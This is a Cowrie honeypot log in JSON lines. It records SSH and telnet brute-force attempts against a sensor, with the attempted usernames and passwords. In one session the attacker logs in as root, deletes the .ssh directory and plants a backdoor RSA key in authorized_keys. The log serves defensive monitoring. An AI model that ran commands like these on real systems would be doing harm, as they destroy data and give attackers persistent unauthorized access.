{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57342,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3fcbe66eb86","protocol":"ssh","message":"New connection: 212.227.235.229:57342 (1.2.3.4:22) [session: d3fcbe66eb86]","sensor":"my-vps","timestamp":"2025-09-08T13:39:30.045742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:39:30.046794Z","src_ip":"212.227.235.229","session":"d3fcbe66eb86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:39:30.173022Z","src_ip":"212.227.235.229","session":"d3fcbe66eb86"}
{"eventid":"cowrie.login.failed","username":"vncuser","password":"admin123","message":"login attempt [vncuser/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:39:30.717055Z","src_ip":"212.227.235.229","session":"d3fcbe66eb86"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:39:30.752838Z","src_ip":"134.199.174.250","session":"7e3d464b766b"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:39:31.845553Z","src_ip":"212.227.235.229","session":"d3fcbe66eb86"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:39:41.050862Z","src_ip":"212.227.235.229","session":"e4fcafbe8884"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53687,"dst_ip":"1.2.3.4","dst_port":23,"session":"0adee8f1b7e5","protocol":"telnet","message":"New connection: 212.227.235.229:53687 (1.2.3.4:23) [session: 0adee8f1b7e5]","sensor":"my-vps","timestamp":"2025-09-08T13:39:51.181048Z"}
{"eventid":"cowrie.session.closed","duration":2.001253128051758,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:39:53.182230Z","src_ip":"212.227.235.229","session":"0adee8f1b7e5"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":35928,"dst_ip":"1.2.3.4","dst_port":22,"session":"82a6e2601d2e","protocol":"ssh","message":"New connection: 134.199.174.250:35928 (1.2.3.4:22) [session: 82a6e2601d2e]","sensor":"my-vps","timestamp":"2025-09-08T13:39:55.778999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:39:55.779887Z","src_ip":"134.199.174.250","session":"82a6e2601d2e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:39:56.039821Z","src_ip":"134.199.174.250","session":"82a6e2601d2e"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"1234567890","message":"login attempt [mysql/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T13:39:56.884526Z","src_ip":"134.199.174.250","session":"82a6e2601d2e"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:39:58.161508Z","src_ip":"134.199.174.250","session":"82a6e2601d2e"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":11355,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4c36c5747de","protocol":"ssh","message":"New connection: 49.247.35.31:11355 (1.2.3.4:22) [session: b4c36c5747de]","sensor":"my-vps","timestamp":"2025-09-08T13:40:00.822366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:40:00.853847Z","src_ip":"49.247.35.31","session":"b4c36c5747de"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:40:01.098904Z","src_ip":"49.247.35.31","session":"b4c36c5747de"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678abc","message":"login attempt [root/12345678abc] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:40:02.099844Z","src_ip":"49.247.35.31","session":"b4c36c5747de"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:40:02.623712Z","src_ip":"49.247.35.31","session":"b4c36c5747de"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:40:02.624502Z","src_ip":"49.247.35.31","session":"b4c36c5747de"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:40:02.625649Z","src_ip":"49.247.35.31","session":"b4c36c5747de"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:40:02.875628Z","src_ip":"49.247.35.31","session":"b4c36c5747de"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:40:03.496354Z","src_ip":"49.247.35.31","session":"b4c36c5747de"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:40:03.497089Z","src_ip":"49.247.35.31","session":"b4c36c5747de"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:40:03.756120Z","src_ip":"49.247.35.31","session":"b4c36c5747de"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:40:03.757057Z","src_ip":"49.247.35.31","session":"b4c36c5747de"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":62170,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab9fdc833c7a","protocol":"ssh","message":"New connection: 49.247.35.31:62170 (1.2.3.4:22) [session: ab9fdc833c7a]","sensor":"my-vps","timestamp":"2025-09-08T13:40:04.039003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:40:04.040348Z","src_ip":"49.247.35.31","session":"ab9fdc833c7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:40:04.341500Z","src_ip":"49.247.35.31","session":"ab9fdc833c7a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:40:05.539037Z","src_ip":"49.247.35.31","session":"ab9fdc833c7a"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:40:06.842715Z","src_ip":"49.247.35.31","session":"ab9fdc833c7a"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":12088,"dst_ip":"1.2.3.4","dst_port":22,"session":"03c0a345e943","protocol":"ssh","message":"New connection: 49.247.35.31:12088 (1.2.3.4:22) [session: 03c0a345e943]","sensor":"my-vps","timestamp":"2025-09-08T13:40:07.093940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:40:07.098545Z","src_ip":"49.247.35.31","session":"03c0a345e943"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:40:07.357361Z","src_ip":"49.247.35.31","session":"03c0a345e943"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:40:08.356661Z","src_ip":"49.247.35.31","session":"03c0a345e943"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:40:08.619325Z","src_ip":"49.247.35.31","session":"b4c36c5747de"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:40:08.620201Z","src_ip":"49.247.35.31","session":"03c0a345e943"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48572,"dst_ip":"1.2.3.4","dst_port":22,"session":"97b9a35091c5","protocol":"ssh","message":"New connection: 212.227.235.229:48572 (1.2.3.4:22) [session: 97b9a35091c5]","sensor":"my-vps","timestamp":"2025-09-08T13:40:15.525960Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:40:15.529030Z","src_ip":"212.227.235.229","session":"97b9a35091c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:40:15.751071Z","src_ip":"212.227.235.229","session":"97b9a35091c5"}
{"eventid":"cowrie.login.failed","username":"phpmyadmin","password":"1234567890","message":"login attempt [phpmyadmin/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T13:40:16.647645Z","src_ip":"212.227.235.229","session":"97b9a35091c5"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:40:17.879310Z","src_ip":"212.227.235.229","session":"97b9a35091c5"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":60750,"dst_ip":"1.2.3.4","dst_port":22,"session":"68b4c44a4d1c","protocol":"ssh","message":"New connection: 134.199.174.250:60750 (1.2.3.4:22) [session: 68b4c44a4d1c]","sensor":"my-vps","timestamp":"2025-09-08T13:40:24.135370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:40:24.136194Z","src_ip":"134.199.174.250","session":"68b4c44a4d1c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:40:24.497650Z","src_ip":"134.199.174.250","session":"68b4c44a4d1c"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"password1","message":"login attempt [mysql/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:40:25.401380Z","src_ip":"134.199.174.250","session":"68b4c44a4d1c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:40:26.711321Z","src_ip":"134.199.174.250","session":"68b4c44a4d1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52908,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b0547a76ba6","protocol":"ssh","message":"New connection: 212.227.235.229:52908 (1.2.3.4:22) [session: 6b0547a76ba6]","sensor":"my-vps","timestamp":"2025-09-08T13:40:29.081617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:40:29.082739Z","src_ip":"212.227.235.229","session":"6b0547a76ba6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:40:29.240977Z","src_ip":"212.227.235.229","session":"6b0547a76ba6"}
{"eventid":"cowrie.login.failed","username":"kafka","password":"123","message":"login attempt [kafka/123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:40:29.764112Z","src_ip":"212.227.235.229","session":"6b0547a76ba6"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:40:30.871622Z","src_ip":"212.227.235.229","session":"6b0547a76ba6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33152,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b869a0ebb0e","protocol":"ssh","message":"New connection: 212.227.235.229:33152 (1.2.3.4:22) [session: 6b869a0ebb0e]","sensor":"my-vps","timestamp":"2025-09-08T13:40:39.145767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:40:39.146648Z","src_ip":"212.227.235.229","session":"6b869a0ebb0e"}
